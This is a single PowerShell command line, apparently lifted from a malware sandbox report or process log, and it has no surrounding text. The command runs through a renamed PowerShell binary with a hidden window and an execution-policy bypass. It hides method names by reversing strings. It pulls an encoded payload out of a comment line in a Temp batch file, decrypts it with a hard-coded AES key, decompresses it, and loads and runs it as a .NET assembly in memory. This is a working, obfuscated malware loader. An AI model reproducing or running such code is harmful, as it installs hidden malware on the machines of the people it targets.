"async1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YJBbV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\async1.bat').Split([Environment]::NewLine);foreach ($NkUDf in $YJBbV) { if ($NkUDf.StartsWith(':: ')) { $JcNlJ = $NkUDf.Substring(3); break; }; };$JzMFw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JcNlJ);$SCaAH = New-Object System.Security.Cryptography.AesManaged;$SCaAH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$SCaAH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$SCaAH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poUZgytmmU5AjB6HrelvPa2m9IAI5avoBXgweEVtJHM=');$SCaAH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZJ8AebITHPrLQOysxJlupA==');$bcmpg = $SCaAH.CreateDecryptor();$JzMFw = $bcmpg.TransformFinalBlock($JzMFw, 0, $JzMFw.Length);$bcmpg.Dispose();$SCaAH.Dispose();$pvpsr = New-Object System.IO.MemoryStream(, $JzMFw);$fgJRB = New-Object System.IO.MemoryStream;$SFExd = New-Object System.IO.Compression.GZipStream($pvpsr, [IO.Compression.CompressionMode]::Decompress);$SFExd.CopyTo($fgJRB);$SFExd.Dispose();$pvpsr.Dispose();$fgJRB.Dispose();$JzMFw = $fgJRB.ToArray();$CxiQm = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JzMFw);$Psztc = $CxiQm.EntryPoint;$Psztc.Invoke($null, (, [string[]] ('')))